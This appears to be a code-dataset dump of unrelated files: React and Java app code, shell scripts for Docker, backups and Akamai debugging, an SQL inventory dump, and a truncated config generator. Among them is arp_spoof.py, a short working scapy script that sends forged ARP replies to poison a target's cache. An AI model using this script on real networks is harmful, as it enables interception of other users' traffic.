text stringlengths 1 1.05M |
|---|
import React, { Component } from 'react'
import { connect } from 'react-redux'
import { Switch, Route, withRouter } from 'react-router-dom'
import Navbar from '../../component/navbar/Navbar'
import ExpenseGroupDetailPage from '../expense-group-detail-page/ExpenseGroupDetailPage'
import ExpenseGroupAddPage from '../expense-group-add-page/ExpenseGroupAddPage'
import ExpenseGroupExpenseAddPage from '../expense-group-expense-add-page/ExpenseGroupExpenseAddPage'
import ExpenseGroupMemberAddPage from '../expense-group-member-add-page/ExpenseGroupMemberAddPage'
import ExpenseGroupsPage from '../expense-groups-page/ExpenseGroupsPage'
import { BlockLoading } from 'react-loadingg'
import { loadingSelector } from '../../redux/selectors'
import FeedbackBar from '../feedback-bar/FeedbackBar'
import { clearFeedback } from '../../redux/interactions'
import history from '../../common/history'
import HomePage from '../home-page/HomePage'
// Root application component: renders the navbar, the global feedback bar,
// a loading overlay driven by the Redux store, and the route table for
// every page of the app.
class App extends Component {
  componentDidMount() {
    let { dispatch } = this.props
    // Clear any visible feedback message on every route change; keep the
    // unsubscribe function so we can detach the listener on unmount.
    this.unlisten = history.listen((location) => {
      clearFeedback(dispatch);
    })
  }

  componentWillUnmount() {
    // Detach the history listener registered in componentDidMount.
    this.unlisten()
  }

  render() {
    // `loading` comes from mapStateToProps (loadingSelector).
    const { loading } = this.props
    return (
      <div>
        <Navbar />
        <FeedbackBar />
        {loading && <BlockLoading />}
        <div className="App">
          {/* Route table. Note: "/expense-groups/add" must be matched before a
              hypothetical "/expense-groups/:param"; here all routes are `exact`
              so ordering is not significant. */}
          <Switch>
            <Route exact path="/" component={HomePage} />
            <Route
              exact
              path="/expense-groups"
              component={ExpenseGroupsPage}
            />
            <Route
              exact
              path="/expense-group/:contractAddress"
              component={ExpenseGroupDetailPage}
            />
            <Route
              exact
              path="/expense-groups/add"
              component={ExpenseGroupAddPage}
            />
            <Route
              exact
              path="/expense-group/:contractAddress/expenses/add"
              component={ExpenseGroupExpenseAddPage}
            />
            <Route
              exact
              path="/expense-group/:contractAddress/members/add"
              component={ExpenseGroupMemberAddPage}
            />
          </Switch>
        </div>
      </div>
    )
  }
}
// Expose the global loading flag from the Redux store as the `loading` prop.
const mapStateToProps = (state) => ({
  loading: loadingSelector(state),
})
export default withRouter(connect(mapStateToProps)(App))
|
package com.mc.user.mapper;
import com.baomidou.mybatisplus.extension.plugins.pagination.Page;
import com.mc.common.model.SysUser;
import com.mc.db.mapper.SuperMapper;
import org.apache.ibatis.annotations.Param;
import java.util.List;
import java.util.Map;
/**
 * [SysUserMapper - MyBatis mapper interface for the system user table]
 *
 * @author likai
 * @version 1.0
 * @date 2019/12/11 0011 15:42
 * @company Gainet
 * @copyright copyright (c) 2019
 */
public interface SysUserMapper extends SuperMapper<SysUser> {
    /**
     * Query the user list with pagination.
     *
     * @param page   MyBatis-Plus pagination object; also carries the page result
     * @param params query filters, bound in the mapper XML under the alias "u"
     * @return the users matching {@code params} for the requested page
     */
    List<SysUser> findList(Page<SysUser> page, @Param("u") Map<String, Object> params);
}
|
<filename>src/models/Tag.ts
import mongoose from "mongoose";

/** Shape of a Tag document as stored in MongoDB. */
export type TagModel = mongoose.Document & {
  name: string;
};

const tagSchema = new mongoose.Schema({
  name: String
});

// Type the model with TagModel so queries (find, findById, ...) return
// TagModel documents instead of the untyped mongoose.Document the original
// untyped `mongoose.model("Tag", ...)` call produced.
const Tag = mongoose.model<TagModel>("Tag", tagSchema);
export default Tag;
|
#!/usr/bin/env bash
#
# dowork.sh - Docker WeChat Work for Linux
#
# Author: Huan (李卓桓) <zixia@zixia.net>
# Copyright (c) 2020-now
#
# License: Apache-2.0
# GitHub: https://github.com/huan/docker-wxwork
#
set -eo pipefail
# Print the DoWork banner and a short description of what this tool does.
# The heredoc delimiter is quoted ('EOF') so the ASCII art is emitted
# verbatim with no parameter expansion.
function hello () {
  cat <<'EOF'
 ____ __ __ _
| _ \ __\ \ / /__ _ __| | __
| | | |/ _ \ \ /\ / / _ \| '__| |/ /
| |_| | (_) \ V V / (_) | | | <
|____/ \___/ \_/\_/ \___/|_| |_|\_\
https://github.com/huan/docker-wxwork
+--------------+
/| /|
/ | / |
*--+-----------* |
| | | |
| | 盒装 | |
| | 企业 | |
| +-- 微信 ---+--+
| / | /
|/ |/
*--------------*
DoWork /dɑɑˈwɜːk/ (Docker-wxWork) is:
📦 a Docker image
🤐 for running PC Windows WeChat Work
💻 on your Linux desktop
💖 by one-line of command
EOF
}
# Fetch the newest zixia/wxwork image from Docker Hub.
# Setting DOWORK_SKIP_PULL to any non-empty value skips the pull entirely.
function pullUpdate () {
  if [ -z "$DOWORK_SKIP_PULL" ]; then
    echo '🚀 Pulling the latest docker image...'
    echo
    docker pull zixia/wxwork
    echo
    echo '🚀 Pulling the latest docker image done.'
  fi
}
# Entry point: show the banner, refresh the image, then run the container
# with the host's devices, X11 socket, and fcitx input-method env wired in.
function main () {
  hello
  pullUpdate

  # Collect every video device plus the sound device directory.
  # NOTE(review): if no /dev/video* exists, the literal unexpanded string
  # '/dev/video*' is passed to --device — confirm docker tolerates that.
  DEVICE_ARG=()
  for DEVICE in /dev/video* /dev/snd; do
    DEVICE_ARG+=('--device' "$DEVICE")
  done

  echo '🚀 Starting DoWork /dɑɑˈwɜːk/ ...'
  echo
  #
  # --privileged: enable sound (/dev/snd/)
  # --ipc=host: enable MIT_SHM (XWindows)
  #
  # NOTE(review): the host path below says "Applcation Data" (missing 'i').
  # Existing installs may already have data under this misspelled directory,
  # so renaming it is a breaking change — confirm before fixing.
  docker run \
    "${DEVICE_ARG[@]}" \
    --name DoWork \
    --rm \
    -i \
    \
    -v "$HOME/DoWork/WXWork/":'/home/user/WXWork/' \
    -v "$HOME/DoWork/Applcation Data":'/home/user/.wine/drive_c/users/user/Application Data/' \
    -v /tmp/.X11-unix:/tmp/.X11-unix \
    \
    -e DISPLAY \
    -e DOWORK_DEBUG \
    -e DOWORK_DPI \
    \
    -e XMODIFIERS=@im=fcitx \
    -e GTK_IM_MODULE=fcitx \
    -e QT_IM_MODULE=fcitx \
    -e AUDIO_GID="$(getent group audio | cut -d: -f3)" \
    -e VIDEO_GID="$(getent group video | cut -d: -f3)" \
    -e GID="$(id -g)" \
    -e UID="$(id -u)" \
    \
    --ipc=host \
    --privileged \
    \
    zixia/wxwork
  echo
  # NOTE(review): $? here is the status of the preceding `echo` (always 0),
  # and `set -eo pipefail` would abort the script on a failing docker run
  # anyway — this line can only ever report 0. Confirm intent.
  echo "📦 DoWork Exited with code [$?]"
  echo
  echo '🐞 Bug Report: https://github.com/huan/docker-wxwork/issues'
  echo
}
main
|
# arp_spoof.py
import sys
from scapy.all import ARP, send
def arp_spoof(target_ip, new_ip):
    """Send a single forged ARP reply (op=2) to ``target_ip`` claiming that
    ``new_ip`` is reachable at this host.

    Requires root privileges (raw socket via scapy's ``send``).
    """
    # NOTE(review): hwdst is the broadcast MAC, so the forged reply is
    # broadcast rather than unicast to the victim's real MAC — confirm
    # this is intentional.
    arp = ARP(op=2, pdst=target_ip, psrc=new_ip, hwdst="ff:ff:ff:ff:ff:ff")
    send(arp, verbose=0)
if __name__ == "__main__":
    # CLI: exactly two positional arguments are required.
    if len(sys.argv) != 3:
        print("Usage: python arp_spoof.py [TARGET IP] [NEW IP]")
        sys.exit(1)
    # NOTE(review): arguments are not validated as IP addresses; malformed
    # input is passed straight to scapy — consider ipaddress.ip_address().
    target_ip = sys.argv[1]
    new_ip = sys.argv[2]
    arp_spoof(target_ip, new_ip)
<filename>src/components/sideMenu/sideMenu.js
const EventHandler = require('../eventHandler/eventHandler');
const MenuList = require('./menuBar/menuList');
const Resizer = require('./resizer');
const Menus = require('./menus');
// Controls the collapsible side menu: the narrow menu bar (MenuList), the
// expandable panel holding the menus themselves (Menus), and the resizer
// between the menu and the main area.
module.exports = class SideMenu {
  constructor() {
    this.isOpen = false;    // whether the menu panel is currently expanded
    this.currentMenu;       // name of the menu shown in the panel (set on open)
    this.MenuList = new MenuList();
    this.resizer = new Resizer();
    this.Menus = [];        // menu instances, populated by loadMenus()
    this.EventHandler = new EventHandler();
    // DOM containers this component manages.
    this.sideMenuComponent = document.getElementById('SideMenu');
    this.menuListComponent = document.getElementById('MenuList');
    this.menusComponent = document.getElementById('Menus');
    this.closedWidth = '3em';
    this.openedWidth = '28em';
  }

  // Apply the initial (collapsed) layout: everything at closedWidth and the
  // menu panel hidden.
  setStyle() {
    this.sideMenuComponent.style.width = this.closedWidth;
    this.sideMenuComponent.style.height = '100%';
    this.menuListComponent.style.width = this.closedWidth;
    this.menuListComponent.style.height = '100%';
    this.menusComponent.style.width = this.closedWidth;
    this.menusComponent.style.height = '100%';
    this.menusComponent.style.display = 'none';
  }

  /**
   * Opens or closes the side menu depending on the current state, and
   * switches the current menu when a different one is requested while open.
   * (Translated from the original Portuguese comment.)
   * @param {String} requestedMenu name of the menu that should be opened
   */
  changeSideMenu(requestedMenu) {
    if (!this.isOpen) {
      this.currentMenu = requestedMenu;
      this.openSideMenu();
    } else if (requestedMenu != this.currentMenu) {
      // Already open: just switch which menu is considered current.
      this.currentMenu = requestedMenu;
    } else {
      // Clicking the already-open menu toggles the panel closed.
      this.closeSideMenu();
    }
  }

  // Expand the panel to its opened width and reveal the menus container.
  openSideMenu() {
    this.sideMenuComponent.style.width = this.openedWidth;
    this.menusComponent.style.display = 'block';
    this.menusComponent.style.width = '25em';
    this.isOpen = true;
  }

  // Collapse the panel back to the narrow bar and hide the menus container.
  closeSideMenu() {
    this.sideMenuComponent.style.width = this.closedWidth;
    this.menusComponent.style.display = 'none';
    this.isOpen = false;
  }

  // Instantiate and build every menu class exported by ./menus.
  loadMenus() {
    Menus.forEach((Menu) => {
      const newMenu = new Menu();
      newMenu.build();
      this.Menus.push(newMenu);
    });
  }

  // Wire up events, build children, and apply the initial styles.
  build() {
    this.EventHandler.addEventListener('ChangeSideMenu', (evt) => {
      this.changeSideMenu(evt);
    });
    this.EventHandler.addEventListener('OpenSideMenu', (evt) => {
      this.currentMenu = evt.requested;
      this.openSideMenu();
    });
    this.MenuList.build();
    this.loadMenus();
    this.setStyle();
    this.resizer.build();
  }
};
<gh_stars>1-10
import unittest
from _8a_scraper.users import get_user_info, get_recommended_ascents, get_user_ascents
class TestUsers(unittest.TestCase):
    """Integration tests for the 8a.nu scraper's user endpoints.

    NOTE(review): the '<NAME>' literals are anonymization placeholders left
    by a dataset scrub — these tests need a real username (and live site
    access) to run.
    """

    def test_get_user_info(self):
        # Expects the profile's location field to match a known user.
        user = '<NAME>'
        user_info = get_user_info(user)
        self.assertEqual(user_info['location'], 'Brno, Czech Republic')

    def test_get_recommended_ascents(self):
        # A known active user should have at least one recommendation.
        user = '<NAME>'
        recs = get_recommended_ascents(user)
        self.assertGreater(len(recs), 0)

    def test_get_user_ascents(self):
        # Both supported categories should return a non-empty ascent log.
        user = '<NAME>'
        ascents = get_user_ascents(user, 'sportclimbing')
        self.assertGreater(len(ascents), 0)
        ascents = get_user_ascents(user, 'bouldering')
        self.assertGreater(len(ascents), 0)


if __name__ == '__main__':
    unittest.main()
|
<reponame>broeker/jumpsuit-build
import React from 'react'
import { Link } from 'gatsby'
import { withStyles } from '@material-ui/core/styles';
import Card from '@material-ui/core/Card';
import CardActionArea from '@material-ui/core/CardActionArea';
import CardContent from '@material-ui/core/CardContent';
import Typography from '@material-ui/core/Typography';
import Img from 'gatsby-image';
import Fade from '@material-ui/core/Fade';
import AuthorDetails from '../AuthorDetails/AuthorDetails'
import { mdiArrowRightBoldCircle} from '@mdi/js'
import Icon from '@mdi/react'
import Grid from '@material-ui/core/Grid';
// Static JSS styles injected via withStyles (material-ui v3 style API).
const styles = {
  root: {
    color: '#37474F',
    height: 'auto',
  },
  icon: {
    // Bug fix: was misspelled 'vertialAlign', so JSS silently dropped the
    // rule and the icon was never bottom-aligned.
    verticalAlign: 'bottom',
    textAlign: 'right',
  },
  card: {
    height: '100%',
    padding: 0,
  }
};
// Card for a single blog post: cover image, category, title, summary and
// author details, with an arrow icon that fades in on hover.
class BlogCard extends React.Component {
  state = {
    checked: false, // true while the pointer hovers the card (drives the Fade)
  };

  // Toggle hover state; bound as both mouse-enter and mouse-leave handler.
  handleChange = () => {
    this.setState(state => ({ checked: !state.checked }));
  };

  // Build the card markup. Expects props: path, media (gatsby fluid image),
  // category, title, summary (raw HTML), changed (date for AuthorDetails).
  renderElement() {
    const { classes } = this.props;
    const { checked } = this.state;
    if (this.props) {
      return (
        <>
          <CardActionArea
            onMouseEnter={this.handleChange}
            onMouseLeave={this.handleChange}
            style={{ textDecoration: 'none' }}
            classes={{
              root: classes.root, // class name, e.g. `classes-nesting-root-x`
            }}
          >
            <Link style={{ textDecoration: 'none'}} to={this.props.path}>
              <Card className={classes.card}>
                {this.props.media &&
                  <Img fluid={this.props.media} />
                }
                <CardContent>
                  <Grid container>
                    <Grid item sm={6}>
                      <Typography variant="overline">{this.props.category}</Typography>
                    </Grid>
                    <Grid item className={classes.icon} sm={6}>
                      {/* Arrow fades in while hovered. */}
                      <Fade in={checked} timeout={ 1500 } >
                        <Icon className={classes.icon} color="#ff9800" path={mdiArrowRightBoldCircle} size={1.2}/>
                      </Fade>
                    </Grid>
                  </Grid>
                  <Typography variant="h3" component="h3">{this.props.title}
                  </Typography>
                  {/* NOTE(review): summary is injected as raw HTML — safe only
                      if it comes from a trusted CMS; confirm the source. */}
                  <Typography variant="subtitle2" dangerouslySetInnerHTML={{ __html: this.props.summary }} />
                  <AuthorDetails
                    changed={this.props.changed}
                  />
                </CardContent>
              </Card>
            </Link>
          </CardActionArea>
        </>
      );
    }
  }

  render() {
    return (
      <>
        { this.renderElement() }
      </>
    )
  }
};

export default withStyles(styles)(BlogCard);
-- phpMyAdmin SQL Dump
-- version 5.1.1
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: Dec 27, 2021 at 02:26 PM
-- Server version: 10.4.22-MariaDB
-- PHP Version: 7.3.33
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `citb2`
--
-- --------------------------------------------------------
--
-- Table structure for table `barang`
--
-- Products: current stock per item, linked to a category
-- (FK to kategori_barang added in the constraints section of the dump).
CREATE TABLE `barang` (
  `id_barang` int(11) NOT NULL,          -- PK; AUTO_INCREMENT added later in the dump
  `nama_barang` varchar(255) NOT NULL,   -- product name
  `stok` int(11) NOT NULL,               -- current stock count
  `cover` varchar(222) NOT NULL,         -- cover image filename
  `kategori_barang_id` int(11) NOT NULL  -- FK -> kategori_barang.id_kategori
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `barang`
--
INSERT INTO `barang` (`id_barang`, `nama_barang`, `stok`, `cover`, `kategori_barang_id`) VALUES
(1, 'Mimi White AHA', 23, '80d15aab824b87bbae2a5b7a6cc12f22.jpg', 2),
(2, 'Liptint Implora - Vampire Blood', 155, 'faa67580d27cb37de39f10b3c45b726f.png', 1),
(3, 'Ombre Combo Lipcream Implora 01 + Liptint Implora 01', 45, '366f1b2a5ff0c3671293ecdfb1e7f36c.png', 1),
(4, 'Ombre Combo Hanasui Brown Sugar + Liptint Implora 01', 30, '788212525ff79dc42750211131eb25d4.png', 1),
(5, 'Ombre Combo Hanasui Salted Caramel + Liptint Implora 01', 28, 'ded4feb5df447ebb43840dbd8045775c.png', 1),
(6, 'Ombre Combo Lip Velvet Honest + Liptint Implora 01', 72, 'e067022be6074fc7134bf7ee496b5349.png', 1),
(7, '<NAME>', 177, '4dfbb71e3ac9758aee257a188b35333c.JPG', 3),
(8, '<NAME>', 110, '57ec61112195bedb011acca6d521fa7d.JPG', 3),
(9, 'Serum Implora - Luminous Brightening Serum', 150, '6ae099dc8785bd726836af073c9ca0ea.JPG', 2),
(10, 'Serum Implora - Acne Serum', 70, '00029a4f68768b9c38cbae85e9286f7f.JPG', 2),
(11, 'Serum Implora - Midnight Serum', 80, 'f1e441c50a380eced76fbbab0d42f7dc.JPG', 2),
(12, 'Serum Implora - Peeling Serum', 90, '29b050138b934e7264d1e0b163ead07a.JPG', 2),
(13, 'Pixy - 01. Natural Beige', 120, 'faaec99cfa0778f5a82eed5fb6805fb1.JPG', 6),
(14, 'Pixy - 02. Sand Beige', 130, 'd339c2afc6df73ae379aed66e13a44c5.JPG', 6),
(15, 'Pixy - 03. Cream Beige', 140, 'db2d232daa660e1a00dd50235c628368.JPG', 6);
-- --------------------------------------------------------
--
-- Table structure for table `barang_keluar`
--
-- Outgoing stock movements: who removed how much of which product, and when.
CREATE TABLE `barang_keluar` (
  `id_barang_keluar` int(11) NOT NULL,  -- PK; AUTO_INCREMENT added later in the dump
  `user_id` int(10) NOT NULL,           -- FK -> user.id (who recorded the movement)
  `barang_id` int(10) NOT NULL,         -- FK -> barang.id_barang
  `jumlah_keluar` int(10) NOT NULL,     -- quantity removed
  `tanggal_keluar` date NOT NULL        -- date of the movement
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `barang_keluar`
--
INSERT INTO `barang_keluar` (`id_barang_keluar`, `user_id`, `barang_id`, `jumlah_keluar`, `tanggal_keluar`) VALUES
(17, 16, 6, 12, '2021-12-27'),
(18, 16, 1, 17, '2021-12-27'),
(19, 16, 1, 170, '2021-12-28'),
(20, 16, 5, 12, '2021-12-28'),
(21, 16, 7, 23, '2021-12-29');
-- --------------------------------------------------------
--
-- Table structure for table `barang_masuk`
--
-- Incoming stock movements: mirror of barang_keluar for received stock.
CREATE TABLE `barang_masuk` (
  `id_barang_masuk` int(11) NOT NULL,  -- PK; AUTO_INCREMENT added later in the dump
  `user_id` int(10) NOT NULL,          -- FK -> user.id (who recorded the movement)
  `barang_id` int(10) NOT NULL,        -- FK -> barang.id_barang
  `jumlah_masuk` int(10) NOT NULL,     -- quantity received
  `tanggal_masuk` date NOT NULL        -- date of the movement
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `barang_masuk`
--
INSERT INTO `barang_masuk` (`id_barang_masuk`, `user_id`, `barang_id`, `jumlah_masuk`, `tanggal_masuk`) VALUES
(19, 16, 2, 10, '2021-12-27'),
(20, 16, 3, 25, '2021-12-27'),
(21, 16, 2, 23, '2021-12-27'),
(22, 16, 6, 34, '2021-12-28'),
(23, 16, 1, 27, '2021-12-16'),
(24, 16, 2, 0, '2021-12-16'),
(25, 16, 2, 112, '2021-12-13'),
(26, 16, 7, 100, '2021-12-01'),
(27, 16, 1, 123, '2021-12-27');
-- --------------------------------------------------------
--
-- Table structure for table `kategori_barang`
--
-- Product categories (e.g. Lipstik, Serum) referenced by barang.
CREATE TABLE `kategori_barang` (
  `id_kategori` int(11) NOT NULL,          -- PK; AUTO_INCREMENT added later in the dump
  `kategori_barang` varchar(255) NOT NULL  -- category display name
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `kategori_barang`
--
INSERT INTO `kategori_barang` (`id_kategori`, `kategori_barang`) VALUES
(1, 'Lipstik'),
(2, 'Serum'),
(3, 'Sabun'),
(6, 'Concealer');
-- --------------------------------------------------------
--
-- Table structure for table `user`
--
-- Application users (login credentials).
CREATE TABLE `user` (
  `id` int(11) NOT NULL,            -- PK; AUTO_INCREMENT added later in the dump
  `username` varchar(50) NOT NULL,
  -- NOTE(review): the dumped rows contain 32-hex-digit values that look like
  -- unsalted MD5 digests; confirm the application uses a modern password
  -- hashing scheme (bcrypt/argon2) rather than MD5.
  `password` varchar(255) NOT NULL,
  `nama` varchar(50) NOT NULL       -- full display name
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `user`
--
-- Seed users. The '<PASSWORD>'/'<NAME>' literals are anonymization
-- placeholders left by a dataset scrub; row 19's value looks like an MD5
-- digest (see the security note on the table definition).
INSERT INTO `user` (`id`, `username`, `password`, `nama`) VALUES
(16, 'admin', '<PASSWORD>', '<PASSWORD>'),
(17, 'agus', '<PASSWORD>', '<NAME>'),
(18, 'dioo', '<PASSWORD>588f1cc932815', 'Agung Dio Asbhi'),
(19, 'tari', 'f024197cc16a7c1eda2e4c677616051d', 'Lestari Kurnia Ningsih');
--
-- Indexes for dumped tables
--
--
-- Indexes for table `barang`
--
ALTER TABLE `barang`
ADD PRIMARY KEY (`id_barang`),
ADD KEY `kategori_barang_id` (`kategori_barang_id`);
--
-- Indexes for table `barang_keluar`
--
ALTER TABLE `barang_keluar`
ADD PRIMARY KEY (`id_barang_keluar`),
ADD KEY `barang_id` (`barang_id`),
ADD KEY `user_id` (`user_id`);
--
-- Indexes for table `barang_masuk`
--
ALTER TABLE `barang_masuk`
ADD PRIMARY KEY (`id_barang_masuk`),
ADD KEY `barang_id` (`barang_id`),
ADD KEY `user_id` (`user_id`);
--
-- Indexes for table `kategori_barang`
--
ALTER TABLE `kategori_barang`
ADD PRIMARY KEY (`id_kategori`);
--
-- Indexes for table `user`
--
ALTER TABLE `user`
ADD PRIMARY KEY (`id`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `barang`
--
ALTER TABLE `barang`
MODIFY `id_barang` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=16;
--
-- AUTO_INCREMENT for table `barang_keluar`
--
ALTER TABLE `barang_keluar`
MODIFY `id_barang_keluar` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=22;
--
-- AUTO_INCREMENT for table `barang_masuk`
--
ALTER TABLE `barang_masuk`
MODIFY `id_barang_masuk` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=28;
--
-- AUTO_INCREMENT for table `kategori_barang`
--
ALTER TABLE `kategori_barang`
MODIFY `id_kategori` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=8;
--
-- AUTO_INCREMENT for table `user`
--
ALTER TABLE `user`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=20;
--
-- Constraints for dumped tables
--
--
-- Constraints for table `barang`
--
ALTER TABLE `barang`
ADD CONSTRAINT `barang_ibfk_1` FOREIGN KEY (`kategori_barang_id`) REFERENCES `kategori_barang` (`id_kategori`);
--
-- Constraints for table `barang_keluar`
--
ALTER TABLE `barang_keluar`
ADD CONSTRAINT `barang_keluar_ibfk_1` FOREIGN KEY (`barang_id`) REFERENCES `barang` (`id_barang`),
ADD CONSTRAINT `barang_keluar_ibfk_2` FOREIGN KEY (`user_id`) REFERENCES `user` (`id`);
--
-- Constraints for table `barang_masuk`
--
ALTER TABLE `barang_masuk`
ADD CONSTRAINT `barang_masuk_ibfk_1` FOREIGN KEY (`barang_id`) REFERENCES `barang` (`id_barang`),
ADD CONSTRAINT `barang_masuk_ibfk_2` FOREIGN KEY (`user_id`) REFERENCES `user` (`id`);
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
|
<gh_stars>0
/** Payload required to create a new game. */
export default interface ICreateGameDTO {
  /** Display name of the game. */
  name: string;
  /** Free-text description of the game. */
  description: string;
  /** Cover image: a fresh upload (File) or an existing image reference (string). */
  image: File | string;
}
|
(defn avg
  "Return the arithmetic mean of the numbers in coll.
   Throws ArithmeticException when coll is empty (division by zero)."
  [coll]
  (/ (apply + coll)
     (count coll)))
#!/bin/bash
#===============================================================================
#
# FILE: Backup-Home.sh
#
# USAGE: ./Backup-Home.sh
#
# DESCRIPTION: Backups home directory to Backups.
#
# OPTIONS: None
# REQUIREMENTS: None
# BUGS: None
# NOTES:
# AUTHOR: Brett Salemink (BS), brett.salemink@gmail.com
# COMPANY: Rogue Designs
# VERSION: 1.0
# CREATED: 12/04/2017 04:02:50 PM CST
# REVISION:
#===============================================================================`
# NOTE(review): SRCDIR is "/" (whole filesystem), while the header says this
# backs up the home directory — confirm which is intended.
SRCDIR="/"
DESTDIR="/mnt/FreeAgent/Backups/Stretch/"
EXCLUDEFILENAME="/home/brettsalemink/.excludefile"   # tar -X exclude list
# NOTE(review): %T expands to HH:MM:SS (contains colons), and FILENAME and
# FILEDATE call `date` separately — a run that straddles a second boundary
# produces mismatched archive/package-list names. Confirm acceptable.
FILENAME=Stretch-Backup-$(date +%Y%m%d%T).tgz
FILEDATE=$(date +%Y%m%d%T)
PACKAGENAME="-package-selection"
PACKAGEFILENAME=$FILEDATE$PACKAGENAME
#-------------------------------------------------------------------------------
# create_package_list: save the dpkg package-selection list next to the
# backup archive so the installed-package set can be restored with
# `dpkg --set-selections` later.
#-------------------------------------------------------------------------------
function create_package_list ()
{
    # Quote the target path — DESTDIR/PACKAGEFILENAME could contain spaces.
    dpkg --get-selections > "$DESTDIR$PACKAGEFILENAME"
}   # -------- end of function create_package_list -----------
#-------------------------------------------------------------------------------
# backup_home: create a gzipped tar of SRCDIR in DESTDIR, honouring the
# exclude file plus tar's built-in backup/VCS-ignore exclusions.
# NOTE(review): SRCDIR is "/" — this archives the whole filesystem, not just
# the home directory the script header describes.
#-------------------------------------------------------------------------------
function backup_home ()
{
    # Quote every expansion so paths with spaces don't word-split.
    echo "$FILENAME"
    tar --create -X "$EXCLUDEFILENAME" --exclude-backups --exclude-vcs-ignores --verbose --gzip --file="$DESTDIR$FILENAME" "$SRCDIR"
}   # ---------- end of function backup_home ----------
# Mirror the local backup directory to the remote "antergos" host over SSH.
# --ignore-existing: never re-transfer files already present remotely.
function sync_antergos()
{
    rsync -rvz --progress --ignore-existing /mnt/FreeAgent/Backups/Stretch/ brettsalemink@antergos.roguedesigns.us:/mnt/Data/Backups/Stretch/
}
# Sync the local backup directory to MEGA cloud storage via mega-sync.
# (Currently disabled at the call site.)
function sync_mega()
{
    mega-sync /mnt/FreeAgent/Backups/Stretch/ /Backups/Stretch/
}
#-------------------------------------------------------------------------------
# remove_local_backups: purge and recreate the local backup directory.
# All removal steps are currently disabled; the ':' no-op keeps the function
# body non-empty — a bash function whose body contains only comments is a
# syntax error, so the original file failed to parse at all.
#-------------------------------------------------------------------------------
function remove_local_backups ()
{
    :
    #echo "Not Removing Old Backups"
    # sudo rm -r /mnt/FreeAgent/Backups/Stretch
    # sudo mkdir /mnt/FreeAgent/Backups/Stretch
    # sudo chown -R nfsusernobody:nfsgroupnone /mnt/FreeAgent/Backups/
    # sudo chmod -R 774 /mnt/FreeAgent/Backups/
}   # -------- end function remove_local_backups -------
# Main sequence: record the package list, archive the source tree, then
# mirror to the remote host. Cloud sync and local cleanup are disabled.
create_package_list
backup_home
sync_antergos
#sync_mega
#remove_local_backups
exit
|
#!/bin/bash
# Fetch a URL with the Akamai debug Pragma headers enabled so the verbose
# output (-v) shows cache status, cache key, extracted values, etc.
[[ -z "$1" ]] && echo "Usage: $0 http://fqdn.tld/uri/to/test/with/get" && exit 1
# `command -v` is the portable, machine-parsable way to locate a binary;
# the original parsed `type` output with awk, whose format is not stable.
curl=$(command -v curl)
[[ ! -x $curl ]] && echo "Curl could not be found; aborting." && exit 1
# Quote the URL: unquoted, query strings with '&'/'?'/'*' would be split or
# glob-expanded by the shell.
"$curl" -L -o /dev/null -v -s -H 'Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no' "$1"
|
#!/bin/sh
# Container entrypoint for YoutubeDL-Material: generate the default config,
# then hand off to the app (via forever) with fixed-up file ownership.
#
# The heredoc delimiter is UNquoted, so ${PORT} below is expanded from the
# environment when the config is written.
# NOTE(review): `set -eu` comes only after this block, so an unset PORT
# silently becomes an empty value in the JSON instead of an error — confirm
# PORT is always provided by the image.
cat << EOF > /app/backend/appdata/default.json
{
  "YoutubeDLMaterial": {
    "Host": {
      "url": "http://example.com",
      "port": ${PORT}
    },
    "Downloader": {
      "path-audio": "audio/",
      "path-video": "video/",
      "default_file_output": "",
      "use_youtubedl_archive": false,
      "custom_args": "",
      "safe_download_override": false,
      "include_thumbnail": true,
      "include_metadata": true,
      "download_rate_limit": ""
    },
    "Extra": {
      "title_top": "YoutubeDL-Material",
      "file_manager_enabled": true,
      "allow_quality_select": true,
      "download_only_mode": false,
      "allow_multi_download_mode": true,
      "enable_downloads_manager": true,
      "allow_playlist_categorization": true
    },
    "API": {
      "use_API_key": false,
      "API_key": "",
      "use_youtube_API": false,
      "youtube_API_key": "",
      "use_twitch_API": false,
      "twitch_API_key": "",
      "twitch_auto_download_chat": false,
      "use_sponsorblock_API": false
    },
    "Themes": {
      "default_theme": "default",
      "allow_theme_change": true
    },
    "Subscriptions": {
      "allow_subscriptions": true,
      "subscriptions_base_path": "subscriptions/",
      "subscriptions_check_interval": "300",
      "redownload_fresh_uploads": false,
      "download_delay": ""
    },
    "Users": {
      "base_path": "users/",
      "allow_registration": true,
      "auth_method": "internal",
      "ldap_config": {
        "url": "ldap://localhost:389",
        "bindDN": "cn=root",
        "bindCredentials": "secret",
        "searchBase": "ou=passport-ldapauth",
        "searchFilter": "(uid={{username}})"
      }
    },
    "Database": {
      "use_local_db": true,
      "mongodb_connection_string": "mongodb://127.0.0.1:27017/?compressors=zlib"
    },
    "Advanced": {
      "default_downloader": "youtube-dl",
